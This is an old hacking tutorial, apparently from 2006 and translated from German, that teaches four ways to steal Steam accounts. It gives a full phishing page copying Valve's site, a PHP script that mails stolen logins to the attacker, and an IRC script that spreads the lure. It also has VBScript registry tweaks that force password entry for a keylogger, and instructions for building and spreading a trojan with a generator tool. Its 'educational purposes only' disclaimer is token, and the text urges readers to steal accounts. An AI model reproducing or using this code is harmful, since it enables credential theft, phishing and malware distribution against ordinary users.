|| Author: sk0r,Czybik/EOF || Back to articles ||
||How to
||Steam accounts

|1: What is Steam?                        |+
|2: About this tutorial                   |+
|3: First way: PHISHING                   |+
|4: Second way: KEYLOGGING                |+
|5: Third way: CLIENTREGISTRY.BLOB        |+
|6: Fourth way: ASTGEN VCK V1.1           |+
|7: About me                              |+

|Author: sk0r/Czybik                                  |+
|Translated by: SkyOut                                |+

|www.sk0r-czybik.de.vu                                |+
|www.eof-project.net                                  |+


|1: What is Steam?|

The Steam client is a program to play several online games, like Counter-Strike 1.6,
Half-Life, Half-Life 2, Counter-Strike: Source, Day of Defeat and more... Because
you can play every game being activated with the users account it became quite popular
to steal such accounts. Steam has no security features to avoid such things, only the
ClientRegistry.blob is encrypted. The moment you get access to the account data you
can change things like Email, password and the security question and that's it, the
account is yours.

|2: About this tutorial|

This tutorial was written by sk0r/czybik in 2006, it describes 4 different ways to
steal the users account. It is necessary to be able to code in programming language for
two ways, the fourth way is using a tool, which generates a source code for you, but
not a binary file, so you must be able to use the interpreter of the language to
get the final trojan horse to use. It will be explained, but it could be helpful to
have some basic knowledge in that language. The best would be to be able to code in
a language, for example, C/C++, C#, VB, asm or another one... When finished with this
tutorial you should be able to steal accounts, but i am not responsible for the things
you do with your knowledge then. This tutorial is for educational purposes only, not
to harm anyone. The examples are not language specific and therefore should be
understandable for anybody and if you are able to code in language you can code your
own code doing the tasks needed to be done. If I show you a code example I will do this
using VB-Script. For questions, suggestions, critics just write an Email to me (see below).

|3: First way: PHISHING|

The easiest way to get access to Steam accounts is via Phishing. This method is based on
Social Engineering techniques, this means, that you trick the user and make him believe
for example the fake page is true. Phishing is used with Emails and HTML-Files, let's
look at some normal example: Mr.X gets some Email, which seems to be from eBay, in this
Email he is asked to login to his account to update his account data. The site he
is going to visit looks exactly like the one of eBay, so the user thinks all is okay
and types in his account information, without recognizing the false URL. And that's it,
now his informations are send to someone else. That's the way Phisher are working,
I'll show you this now. Now make a HTML-File with the following code:

|																														 |
|<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">																		 |
|<html>																														 |
|																														 |
|<head>																														 |
|	<title>Steam Account Validation</title>																									 |
|	<meta name="pishing" value="steamaccount">																								 |
|	<meta name="author" name="sk0r.Czybik">																									 |
|	<link rel="stylesheet" type="text/css" href="http://www.steampowered.com/steampowered.css">																		 |
|	<!-- css2 -->																												 | 
|	<link rel="Shortcut Icon" type="image/png" href="/webicon.png">																						 |
|	<script language="JavaScript" src="nav.js"></script>																							 |
|	<link href="http://www.steampowered.com/rss.xml" rel="alternate" type="application/rss+xml" title="Valve RSS News Feed" />														 |
|</head>																													 |
|																														 |
|<body>																														 |
|																														 |
|<!-- begin header -->																												 |
|<div class="header">																												 |
|<nobr><a href="index.php"><img src="http://www.steampowered.com/img/steam_logo_onblack.gif" align="top" alt="[Steam]" height="54" width="152"></a>												 |
|<span class="navBar">																												 |
|	<a href="http://storefront.steampowered.com/v2/"><img name="games" valign="bottom" height="22" width="66" src="http://www.steampowered.com/img/games.gif"></a> 									         |
|																														 |
|	<a href="index.php?area=news"><img name="news" valign="bottom" height="22" width="54" src="http://www.steampowered.com/img/news.gif"></a>												 |
|																														 |
|	<a href="http://www.steampowered.com/index.php?area=getsteamnow"><img valign="bottom" height="22" width="108" src="http://www.steampowered.com/img/getSteamNow.gif"></a>								 |
|																														 |
|	<a href="index.php?area=cybercafes"><img valign="bottom" height="22" width="95" src="http://www.steampowered.com/img/cafes.gif"></a>													 |
|																														 |
|	<a href="http://support.steampowered.com/"><img valign="bottom" height="22" width="68" src="http://www.steampowered.com/img/support.gif"></a>												 |
|																														 |
|	<a href="index.php?area=forums"><img valign="bottom" height="22" width="68" src="http://www.steampowered.com/img/forums.gif"></a>													 |
|																														 |
|	<a href="http://www.steampowered.com/status/status.html"><img valign="bottom" height="22" width="65" src="http://www.steampowered.com/img/status.gif"></a>									         |
|</span>																													 |
|</nobr>																													 |
|</div>																														 |
|<!-- end header -->																												 |
|																														 |
|																														 |
|<div class="content" id="container">																									         |
|<h1>Account validation</H1>																											 |
|<h2>Please, <em>shortly, verify your account to play secure.</em></h2><br>																					 |
|<br>																														 |
|Dear Steam Subscriber,<br>																											 |
|Because of the Hacking and Cheating in Steam Games Valve wants<br>																						 |
|you to verify your account with your Cd-Key on the Steam servers.<br>																						 |
|This is necessary because we must be sure that you own a legal<br>																						 |
|buyed steam account. Please input your account data and click<br>																						 |
|'Loging'. Then you will receive an email a few minutes later. This<br>                                  																	 |
|email contain the result of the validation. If your result is positive,<br>																					 |
|you can play again. <br>																											 |
|<br>																														 |
|																														 |
|<br>																														 |
|																														 |
|<style type="text/css">																											 |
|.div1 {																													 |
|position: absolute;																												 |
|top: 327px;																													 |
|color:#BFBA50;																													 |
|left: 15%;																													 |
|width: 195px;																													 |
|height: 150px;																													 |
|border: 0px;																													 |
|background-color: #4C5844;																											 |
|}																														 |
|</style>																													 |
|<table cellpadding="8">                        																								 |
|<tr>																														 |																													 |
|<td>																														 |
|<form action="senddata.php" enctype=multipart/form-data method="post" name="pishacc">																				 |
|                                                     Accountname: <input type="text" name="account"><br><br>                                                      Password:      <input type="password" name="passw">                           |
|<br><br>                                                                                         <input type="submit" name="subAccPw" value="     Login     "></form><br>									 |
|</td>																														 |
|<td width="32px"> </td>																											 |
|</tr>                                                   																							 |
|</table>																													 |
|<br><br>																													 |
|<hr style="width:95%;">																											 |
|																														 |
|</div>																														 |
|																														 |
|																														 |
|<!-- begin footer -->																												 |
|<div class="footer">																												 |
|	<table cellpadding="0" cellspacing="0"																									 |
|	<tr>																													 |
|		<td><a href="http://www.valvesoftware.com"><img src="http://www.steampowered.com/img/valve_greenlogo.gif"></a></td>														 |
|		<td> </td>																											 |
|		<td><span class="footerfix">© 2006 Valve Corporation. All rights reserved. Valve, the Valve logo, Half-Life, the Half-Life logo, the Lambda logo, Steam, the Steam logo,                                                         |
|		    Team Fortress, the Team Fortress logo, Opposing Force, Day of Defeat, the Day of Defeat logo, Counter-Strike, the Counter-Strike logo, Source, the Source logo and Counter-Strike:                                           |
|                   Condition Zero are trademarks and/or registered trademarks of Valve Corporation. <a href="http://www.valvesoftware.com/privacy.htm">Privacy Policy</a>. <a href="http://www.valvesoftware.com/legal.htm">Legal</a>.          |
|                   <a href="http://www.steampowered.com//index.php?area=subscriber_agreement">Steam Subscriber Agreement</a>.</span></td>													 |
|		<td width="15%"> </td>																										 |
|	</tr>																													 |
|	</table>																												 |
|</div>																														 |
|<!-- end footer -->																												 |
|																														 |
|<script src="http://www.google-analytics.com/urchin.js"																							 |
|	type="text/javascript">																											 |
|	</script>																												 |
|	<script type="text/javascript">																										 |
|	_uacct = "UA-355860-1";																											 |
|	urchinTracker();																											 |
|	</script>																												 |
|                           																											 |
|                                                                                                                                                                                                                                                |
|</body>                                                                                                                                                                                                                                         |
|</html>                                                                                                                                                                                                                                         |
|                                                                                                                                                                                                                                                |

Save this document and look how similar it is to the style of Valves homepage. The
good thing about phishing is, that you can copy the source code of the site you want
to fake (Look at this example). Now you need a PHP-Script, which will take in the
date typed by the user and send it via Mail() function to your Email, for example:

|                                                                                                                                                 |
|<?                                                                                                                                               |
|  $email=$_POST[account];                                                                                                                        |
|  $password=$_POST[passw];                                                                                                                       |
|  $Header = "Hacked by sk0r / Czybik - www.sk0r-czybik.de.vu";                                                                                   |
|                                                                                                                                                 |
|if ($email=="" || $password=="") {                                                                                                               |
|    echo "No Account data was given. Return <a href=javascript:history.back(0)>back</a> to the form";                                            |
|}                                                                                                                                                |
|else {                                                                                                                                           |
|        mail("yourmail@isp.com", "Steam Account pishing", "Accountname: $email"." | "."Accountpasswort: $password"." | ", $Header);              |
|        echo "<center><h1>Error 404</h1><br><br>";                                                                                               |
|        echo "The page could not be found<br>";                                                                                                  |
|        echo "<br><br>";                                                                                                                         |
|        echo "<p style=color:white;>Hacked by sk0r / Czybik</p>";                                                                                |
|}                                                                                                                                                |
|?>                                                                                                                                               |
|																		  |

This script will send you the account name and password, be sure to take a server, which is
able to do this. Make sure the user is no recognizing it, otherwise he/she could
change his account data before you receive the information. When you are finished
with the HTML-File and the PHP-Script, load them up to a server and spread the link
to it, for example via Email or IRC, I like Email most of course. To spread via IRC
you could do a script that will message a user, when he joins the channel you are in,
this could look like this:

|																	     |
|On *:Join:#: {                                                                                                                              |
|	/unset %vic                                                                                                                          |
|	/unset %msg                                                                                                                          |
|	set %vic = $nick                                                                                                                     |
|	set %msg = Every steam user is asked to verify his account information --> http://www.steampowered.de.ms                             |
|	If (%vic != $me) { halt}                                                                                                             |
|	/amsg %vic %msg                                                                                                                      |
|}                                                                                                                                           |
|                                                                                                                                            |

An Email would be much better of course, maybe with a faked sender, too. Using a
HTML-Email is the best way to trick a user, it looks most realistic and similar to
the original one and be sure if the user believes what he sees in the Email he will
fill out the form on your page. Style, text and grammar are most important, if you
have mistakes in the text and the style is different to the original one then the
user will not believe it and it does not matter how good the text might be.
You could send the Email to specific people, that have an account, about 25 names
should be enough. You could also make a Spam-Bot searching through the internet for
Emails, which are in a relation to Steam, that would be an even more professional
way to start stealing accounts.

|4: Second way: KEYLOGGING|

A favoured way to get the users data is by getting him to execute a trojan horse,
that will do some keylogging and send the data back to your Email. Steam has the
feature to automatically login, so you first have to modify Steam that the user is
forced to type in his password all time, when he wants to play. There are two possible
ways to do this. The first would be to delete the ClientRegistry.blob file in the Steam
directory, this will force the user to login with his password, the litte disadvantage
is, that this file contains several other information and when deleted Steam has to
update. That's why I don't recommend this one. The file can be find under:

|                                                         |
|%installfolder%\Steam\ClientRegistry.blob                |
|%installfolder%\Valve\Steam\ClientRegistry.blob          |
|                                                         |

You can easily get the path via Registry:

|                                                                      |
|HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\InstallPath                   |
|                                                                      |

This one you can save to a variable and append the name (example in VB-Script):

|                                                                                                    |
|Set wshs = CreateObject("WScript.Shell")                                                            |
|CheckSteam = wshs.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\" & "InstallPath")               |
|If CheckSteam <>"" Then                                                                             |
|ClientRegistry = CheckSteam + "\ClientRegistry.blob"						     |
|End If												     |
|												     |

Now to the second way, the better one. You write a Registry value in the Steam key,
forcing the user to log in every time he wants to access the games and it is recommended
to stop Steam from automatically starting, it's better for the trojan horse:

|                                                                                                 |
|Set wshs = CreateObject("WScript.Shell")                                                         |
|wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Steam", ""        |
|wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\RefreshLoginRequired", 1, "REG_DWORD"      |
|                                                                                                 |

Make sure that "RefreshLoginRequired is a REG_DWORD value. We're almost done with
that. Now we should do some IF-Function, which will start the keylogging function,
when Steam is active. Always overwrite those two Registry keys to make sure the user
is not changing it manually while setting options in Steam. Now we have the password,
but the user name is missing, but that is easy, Steam is creating one folder, named
exactly like the users account name in the Steam directory, here some example code
in VB-Script:

|                                                                   |
|Set fso = CreateObject("Scripting.FileSystemObject")               |
|SteamApps = CheckSteam + "\SteamApps"                              |
|Set GetNameFolders = fso.GetFolder (SteamApps)                     |
|For Each Ordner in GetNameFolders                                  |
|Accountname = Accountname + Ordner.name + Vbcrlf                   |
|Next                                                               |
|                                                                   |

Now we have account name and password. Now go on coding a trojan horse with the
information i gave you, I recommend VB for this, its easy to code a such a program
with it. The data could be send via PHP-Script or SMTP-Engine. For an example look
at the source code of Win32.KillAvSteam.


This is definitely the hardest way to get the users account data. The "ClientRegistry.blob"
is an encrypted file, which is containing several options of Steam, account name and
password, too. It is possible to get those information via this file, but until now
it has not been tried or done. There are some tools out there, but they don't work
well and just show up false informations.
To get the informations with this technique you must know much more about the
structure of this file. It seems to be a binary file, that would need to be converted
first. It is also not known how the name and password are stored, as strin, as keycode,
as encrypted string, which algorithm? All the question are not answered, yet. To
answer them you must work for Valve or spend much time analyzing the file, you must
have good knowledge in a high level language. If you are able to do all this, you can
try writing a trojan horse doing all this and decrypting/converting the file to get
the name and password. If you are at this point, just make a SMTP-Engine to send the
information via Email to yourself, its possible...

|6: Fourth way: ASTGEN VCK V1.1|

This is the most easy way to steal the account information of someone else. With
the Advanced Steam Trojan Generator v1.1 (Astgen1.1) you can create trojan horses
source code, setting several specific options. The created program has a keylogging
function and sends the information via a Email using a PHP-Script, which is generated 
automatically, too. The source code is generated in Visual Basic, to compile it
you need the file MS Visual Basic 6.0. I will explain now how to use this kit.
First load the trojan from my site under "Tools". When you are finished loading,
execute the file "Astgen1.1.exe", important to do: In the field "Deine Emailadresse"
you have to type your own Email address, the collected information will be send there.
In the field "Link zum PHP-Skript" you have to type in the link to the PHP-Script file,
containing the form data (The generator creates two PHP-Scripts, one as a form, where
the data is put into and another one sending the data via Mail() function). In the
"Form options" section fill out everything but make sure that the "Formname" is not
identical with the "Processname". In the section Registry you can choose how the trojan
horse should work, I recommend "Use RefreshLoginRequired" because the other one is
deleting the "ClienRegistry.blob" again and again, forcing Steam to update all the
time. This could irritate the user quite fast and is looking really suspicious.
You can also decide whether you want to set the Registry values for hiding files
and file extensions. In the section "Application" you can set the location, where
the program shall copy to, when executed the first time ("Make backup to"). Under
"Keylogg times(minutes)" you must decide how many minutes the program shall log
data. Then you have to decide whether the trojan horse shall start logging since
system start or when the "Steam.exe" gets executed, I recommend the second one.
Then you have to set the number telling the program how often to log information,
when this number is reached it will stop sending information to you or logging anything.
If you like you can set an option, which will result in the deletion of important
Steam files, when this number is reached (When the trojan horse has done its job),
this will force the user to reinstall Steam. You could also display some message,
text, title and icon can be set by you. Last, but not least you can decided whether
the program shall block important CS and AV sites or not.
Now click on "Generieren" and a new folder will be created, named "Trojan-Source",
it contains four files: "Form-Source.php", which was set by the "Link" option, the
"phpemail.php" file, this is the script sending you all files via Email, the
"SteamAccTrojan.frm" file containing the source code and the "Project1.vbp" file,
this is a project file, containing information about the Form file. Now open the
file "Project1.vbp", wait until everything is loaded and go to the left, "File"->
"Make Valve Patch - Steam.exe", a window will pop up asking for the location to save
the final executable file. Your trojan horse shpould be ready now. If there was any
error while compiling related to the source code, please write an Email to me with
an error description, so I can fix it soon. Be creative, you could phishing in
combination with the trojan horse for example and go on spreading your trojan now.
To use "Astgen1.1" you must accept the disclaimer. Now load up the .php files to
your webserver, they must be in the same directory, the "Form-Source.php" must be
accessable exactly the way you typed it into the "PHP-Skript" field.

|7: About me|

For questions about this tutorial, malware or Steam feel free to write me an Email
to sk0r1337@gmx.de or write something in my guestbook on my homepage, best regards